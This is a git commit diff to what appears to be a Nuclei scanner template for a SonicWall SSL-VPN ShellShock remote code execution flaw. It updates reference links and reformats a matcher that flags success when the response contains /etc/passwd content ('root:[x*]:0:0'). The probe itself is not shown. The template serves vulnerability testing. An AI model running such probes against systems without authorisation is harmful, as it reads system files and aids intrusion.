few updates
parent
7f1abf1e4b
commit
a887ebe289
|
@ -4,7 +4,9 @@ info:
|
||||||
name: Sonicwall SSLVPN ShellShock RCE
|
name: Sonicwall SSLVPN ShellShock RCE
|
||||||
author: PR3R00T
|
author: PR3R00T
|
||||||
severity: critical
|
severity: critical
|
||||||
reference: https://twitter.com/chybeta/status/1353974652540882944/photo/1
|
reference: |
|
||||||
|
- https://twitter.com/chybeta/status/1353974652540882944
|
||||||
|
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -15,12 +17,13 @@ requests:
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Accept-Language: en
|
Accept-Language: en
|
||||||
Connection: close
|
Connection: close
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "root:[x*]:0:0"
|
- "root:[x*]:0:0"
|
||||||
part: body
|
part: body
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
Loading…
Reference in New Issue